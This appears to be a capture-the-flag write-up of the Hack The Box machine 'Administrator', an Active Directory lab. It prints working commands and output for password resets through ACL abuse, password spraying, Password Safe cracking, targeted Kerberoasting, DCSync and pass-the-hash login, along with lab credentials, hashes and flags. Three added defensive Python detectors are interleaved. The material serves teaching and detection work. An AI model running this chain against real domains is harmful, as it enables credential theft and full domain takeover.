Administrator
AD box on HTB.

Enumeration:
Port Scanning:
As always we are going to start with nmap:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.122.91
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 04:58 +03
Nmap scan report for 10.129.122.91
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2025-09-17 04:58:39 +03 for 192s
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-17 08:59:14Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: 7h00m04s
<snipped>
This time we have port 21 (FTP) open, and nmap could not authenticate as anonymous, because I did not see that in the result, which means we have to find a valid username and password.
We will see the clock skew is too great, so I will sync the time with the target machine with ntpdate for any further Kerberos usage:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ sudo ntpdate 10.129.122.91
2025-09-17 12:03:27.177419 (+0300) +25204.812522 +/- 0.086912 10.129.122.91 s1 no-leap
CLOCK: time stepped by 25204.812522
Also, let's get the domain name and the target machine name, and add them to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.122.91 DC.administrator.htb administrator.htb DC
We are provided with a username and password to emulate assumed-breach scenarios in real-world engagements: olivia:ichliebedich.
BloodHound:
As we have a domain user, we can start by ingesting the data and uploading it to BloodHound. I will ingest using both bloodhound-python and rusthound-ce, because if one misses something the other completes it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]
└─$ bloodhound-python -u olivia -p 'ichliebedich' -ns 10.129.122.91 -d administrator.htb -dc dc.administrator.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 38S
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]
└─$ rusthound-ce -u olivia -p ichliebedich -d administrator.htb -f dc.administrator.htb -i 10.129.122.91 -n 10.129.122.91
---------------------------------------------------
Initializing RustHound-CE at 05:06:21 on 09/17/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-17T02:06:21Z INFO rusthound_ce] Verbosity level: Info
[2025-09-17T02:06:21Z INFO rusthound_ce] Collection method: All
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-17T02:06:22Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:24Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=administrator,DC=htb
[2025-09-17T02:06:24Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:33Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb
[2025-09-17T02:06:33Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:38Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=administrator,DC=htb
[2025-09-17T02:06:38Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=administrator,DC=htb
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-17T02:06:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=administrator,DC=htb
[2025-09-17T02:06:39Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-17T02:06:39Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-09-17T02:06:39Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-17T02:06:39Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 11 users parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_users.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_groups.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_computers.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_ous.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_domains.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_gpos.json created!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-17T02:06:39Z INFO rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_containers.json created!
RustHound-CE Enumeration Completed at 05:06:39 on 09/17/25! Happy Graphing!
Start BloodHound, and upload the ingested data to it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
<snipped>
......................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080
Lateral Movement:
Mark olivia as owned, and check its outbound object control:

We have GenericAll over the michael user, which allows several attacks: a targeted Kerberoast (add an SPN to the target user, request his TGS, then remove the SPN), shadow credentials to dump this user's NTLM hash, or simply changing this user's password.
I will use bloodyAD to do so:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u olivia -p 'ichliebedich' set password 'michael' 'Caesar3#'
[+] Password changed successfully!
Confirm the password has been changed successfully:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u michael -p 'Caesar3#'
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [+] administrator.htb\michael:Caesar3#
Move on to michael, and see his outbound object control:

So we can change benjamin's password as well.
I will use the same approach:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u michael -p 'Caesar3#' set password 'benjamin' 'Caesar3#'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u benjamin -p 'Caesar3#'
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [+] administrator.htb\benjamin:Caesar3#
See this user's groups:

We are part of the share moderators group, so maybe we can do something with FTP.
FTP Enumeration:
Try to access ftp with those credentials:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ ftp benjamin@10.129.122.91
Connected to 10.129.122.91.
220 Microsoft FTP Service
331 Password required
Password: Caesar3#
230 User logged in.
Remote system type is Windows_NT.
ftp>
We successfully managed to authenticate, which we could not do previously.
Let's enumerate what files or folders there are:
ftp> ls
229 Entering Extended Passive Mode (|||60739|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||60741|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 952 3.79 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (2.51 KiB/s)
ftp> exit
221 Goodbye.
We find the Backup.psafe3 file, and I downloaded it with the ftp built-in get command.
This file type is new to us, so we can do some searching to find out what it is and how we can open or interact with it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database
It is a database.
I searched a little bit and found this HTML web page that tells us about a tool called pwsafe:
And I have it installed on my Kali VM.
Let's open that backup file:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ pwsafe Backup.psafe3
I tried multiple default passwords to access the database but could not, so we have to find a way to retrieve the master password.
Search a bit:

We will find that hashcat has a mode that can recover the password, or we can use john with one of its tools, pwsafe2john:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
Now attempt to crack it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ john Backup.psafe3.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2025-09-17 05:13) 5.263g/s 32336p/s 32336c/s 32336C/s 123456..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Here is the password.
Lateral Movement again to emily:
Let's open that database again by specifying that password as the master password:


We can copy the usernames and the passwords, and save them into a file to spray them:

Using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ netexec smb 10.129.122.91 -u users.txt -p passwords.txt --continue-on-success
SMB 10.129.122.91 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\alexander:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\olivia:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\michael:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\benjamin:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\administrator:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
SMB 10.129.122.91 445 DC [-] administrator.htb\ethan:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
We find that only emily's password worked, for emily herself.
Check BloodHound again:

We have GenericWrite over ethan.
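The GenericAll and GenericWrite edges found so far are what a defender would look for in the same collector output. An added example (not part of the original write-up) that lists account-takeover ACEs held by non-privileged principals in BloodHound-style users JSON and computes which accounts one compromised user can reach; the SIDs, the sample data and the ForceChangePassword right on benjamin are constructed assumptions.

```python
import json

# Rights on a user object that allow taking over the account
# (password reset, SPN write, key-credential write, DACL/owner change).
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword",
                   "WriteDacl", "WriteOwner", "Owns", "AddKeyCredentialLink"}
# Principals expected to hold such rights: Administrator, Domain Admins,
# Enterprise Admins (by RID) and SYSTEM, Administrators, Account Operators.
PRIVILEGED_RIDS = {"500", "512", "519"}
PRIVILEGED_SIDS = {"S-1-5-18", "S-1-5-32-544", "S-1-5-32-548"}

DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID


def _user(rid, name, aces):
    """Build one constructed record in the collectors' users.json shape."""
    return {"ObjectIdentifier": f"{DOM}-{rid}",
            "Properties": {"name": f"{name}@ADMINISTRATOR.HTB"},
            "Aces": [{"PrincipalSID": sid, "PrincipalType": kind,
                      "RightName": right, "IsInherited": False}
                     for sid, kind, right in aces]}


DA = (f"{DOM}-512", "Group", "GenericAll")  # Domain Admins: expected, ignored
# Constructed sample: RIDs are invented, the edges follow the write-up.
SAMPLE_USERS_JSON = json.dumps({"data": [
    _user(1108, "OLIVIA", [DA]),
    _user(1109, "MICHAEL", [DA, (f"{DOM}-1108", "User", "GenericAll")]),
    _user(1110, "BENJAMIN", [DA, (f"{DOM}-1109", "User", "ForceChangePassword")]),
    _user(1112, "EMILY", [DA]),
    _user(1113, "ETHAN", [DA, (f"{DOM}-1112", "User", "GenericWrite")]),
]})


def is_privileged(sid):
    """True for built-in privileged SIDs and privileged domain RIDs."""
    if sid in PRIVILEGED_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in PRIVILEGED_RIDS


def risky_edges(users_json):
    """Return (principal, right, target) for takeover ACEs held by non-admins."""
    users = json.loads(users_json)["data"]
    names = {u["ObjectIdentifier"]: u["Properties"]["name"] for u in users}
    edges = []
    for u in users:
        for ace in u.get("Aces", []):
            sid = ace["PrincipalSID"]
            if ace["RightName"] in TAKEOVER_RIGHTS and not is_privileged(sid):
                edges.append((names.get(sid, sid), ace["RightName"],
                              u["Properties"]["name"]))
    return edges


def blast_radius(edges, start):
    """Accounts reachable from `start` by following takeover edges."""
    reached, frontier = set(), [start]
    while frontier:
        cur = frontier.pop()
        for src, _right, dst in edges:
            if src == cur and dst != start and dst not in reached:
                reached.add(dst)
                frontier.append(dst)
    return reached


if __name__ == "__main__":
    found = risky_edges(SAMPLE_USERS_JSON)
    for src, right, dst in found:
        print(f"{src} --{right}--> {dst}")
    print(sorted(blast_radius(found, "OLIVIA@ADMINISTRATOR.HTB")))
```

Every edge it prints is an ACE to remove or justify; an empty blast radius for ordinary users is the target state.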
Domain Privilege Escalation:
This time I will perform a targeted Kerberoast attack using a tool called targetedKerberoast to set an SPN for ethan, request his TGS, and then remove that SPN:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ python3 /opt/Tools/targetedKerberoast/targetedKerberoast.py -v -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$<snipped>
[VERBOSE] SPN removed successfully for (ethan)
Attempt to crack his hash with hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ hashcat ethan.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$<snipped>:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....c64150
Time.Started.....: Wed Sep 17 05:19:39 2025 (0 secs)
Time.Estimated...: Wed Sep 17 05:19:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 716.5 kH/s (1.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> iheartyou
Hardware.Mon.#1..: Util: 14%
<snipped>
And finally, check ethan's ACLs over other objects:

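From the defender's side, the add-SPN, request-ticket, remove-SPN sequence used against ethan leaves a recognisable trace on the domain controller. An added example (not from the original write-up) that correlates event 5136 changes to servicePrincipalName with event 4769 ticket requests; the events, the SPN values and the svc_sql account are constructed, directory-service change auditing is assumed to be enabled, and the sample assumes the CN in the object DN equals the account name.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)          # max gap between SPN add and removal
ADDED, DELETED = "%%14674", "%%14675"   # 5136 OperationType: value added / deleted
RC4 = "0x17"                            # etype 23, the "23" in $krb5tgs$23$


def _chg(ts, who, dn, spn, op):
    """Constructed 5136 record (directory object modified)."""
    return {"EventID": 5136, "TimeCreated": ts, "SubjectUserName": who,
            "ObjectDN": dn, "ObjectClass": "user",
            "AttributeLDAPDisplayName": "servicePrincipalName",
            "AttributeValue": spn, "OperationType": op}


def _tgs(ts, requester, service, etype):
    """Constructed 4769 record (Kerberos service ticket requested)."""
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": requester,
            "ServiceName": service, "TicketEncryptionType": etype}


USERS = "CN=Users,DC=administrator,DC=htb"
# Constructed sample: one transient SPN on ethan, one permanent SPN on a
# hypothetical service account that must not be flagged.
EVENTS = [
    _chg("2025-01-01T10:00:00", "emily", f"CN=ethan,{USERS}", "example/ethan", ADDED),
    _tgs("2025-01-01T10:00:01", "emily@ADMINISTRATOR.HTB", "ethan", RC4),
    _chg("2025-01-01T10:00:02", "emily", f"CN=ethan,{USERS}", "example/ethan", DELETED),
    _chg("2025-01-01T11:00:00", "administrator", f"CN=svc_sql,{USERS}",
         "MSSQLSvc/db01.administrator.htb:1433", ADDED),
    _tgs("2025-01-01T11:05:00", "olivia@ADMINISTRATOR.HTB", "svc_sql", "0x12"),
]


def _t(event):
    return datetime.fromisoformat(event["TimeCreated"])


def _account(dn):
    """First RDN value of the DN, assumed to equal the account name."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def find_transient_spn(events):
    """Flag SPNs added to a user and removed again by the same subject."""
    spn = [e for e in events if e["EventID"] == 5136
           and e["ObjectClass"] == "user"
           and e["AttributeLDAPDisplayName"] == "servicePrincipalName"]
    key = lambda e: (e["ObjectDN"], e["AttributeValue"], e["SubjectUserName"])
    findings = []
    for add in (e for e in spn if e["OperationType"] == ADDED):
        for rem in (e for e in spn if e["OperationType"] == DELETED):
            if key(rem) != key(add):
                continue
            if not timedelta(0) <= _t(rem) - _t(add) <= WINDOW:
                continue
            acct = _account(add["ObjectDN"])
            # Ticket requests for that account while the SPN existed.
            tickets = [e for e in events if e["EventID"] == 4769
                       and e["ServiceName"].lower() == acct
                       and _t(add) <= _t(e) <= _t(rem)]
            findings.append({
                "actor": add["SubjectUserName"], "target": acct,
                "spn": add["AttributeValue"],
                "rc4_ticket": any(t["TicketEncryptionType"] == RC4 for t in tickets),
                "requesters": sorted({t["TargetUserName"] for t in tickets}),
            })
            break
    return findings


if __name__ == "__main__":
    for finding in find_transient_spn(EVENTS):
        print(finding)
```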
So ethan has replication rights over the domain, which means we can perform DCSync on the domain. I will use impacket-secretsdump to do that:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.122.91
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
<snipped>
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
<snipped>
[*] Cleaning up...
Let's authenticate with the domain administrator's NTLM hash:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ evil-winrm -i 10.129.122.91 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.122.91
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Get the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
060967316fa6601108f77a70fed17970
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\emily\Desktop\user.txt
606f19540bf4f9b1365f182dd36185cb
*Evil-WinRM* PS C:\Users\Administrator\Documents>
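The DCSync step performed with ethan's account is visible on the domain controller as event 4662 carrying the directory replication control-access rights. An added example (not from the original write-up) that flags non-DC accounts exercising DS-Replication-Get-Changes-All; the events, the DC02$ replication partner and the svc_sync account are constructed, and object-access auditing on the domain object is assumed.

```python
import re
from collections import defaultdict

# Control-access right GUIDs that make up directory replication.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_ALL = "DS-Replication-Get-Changes-All"   # needed to pull password data
CONTROL_ACCESS = 0x100                       # 4662 access mask bit
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def _ev(who, guid):
    """Constructed 4662 record on the domain object (domainDNS class)."""
    return {"EventID": 4662, "SubjectUserName": who, "AccessMask": "0x100",
            "Properties": "%%7688\n\t\t{" + guid + "}\n\t"
                          "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"}


GET, ALL = list(REPL_RIGHTS)[:2]
# Constructed sample: ethan replicates secrets, a second DC replicates
# legitimately, a sync account only reads changes, an admin resets a password.
EVENTS = [
    _ev("ethan", GET),
    _ev("ethan", ALL),
    _ev("DC02$", GET),
    _ev("DC02$", ALL),
    _ev("svc_sync", GET),
    _ev("administrator", "00299570-246d-11d0-a768-00aa006e0529"),
]


def dcsync_suspects(events, dc_accounts):
    """Map each non-DC subject that used Get-Changes-All to its rights."""
    allowed = {a.lower() for a in dc_accounts}
    seen = defaultdict(set)
    for e in events:
        if e["EventID"] != 4662:
            continue
        if not int(e["AccessMask"], 16) & CONTROL_ACCESS:
            continue
        subject = e["SubjectUserName"].lower()
        if subject in allowed:
            continue
        for guid in GUID_RE.findall(e["Properties"]):
            right = REPL_RIGHTS.get(guid.lower())
            if right:
                seen[subject].add(right)
    return {s: sorted(r) for s, r in seen.items() if GET_ALL in r}


if __name__ == "__main__":
    print(dcsync_suspects(EVENTS, {"DC$", "DC02$"}))
```

The allowlist should contain only domain controller machine accounts; any user account in the result holds or has been granted replication rights and should be reviewed.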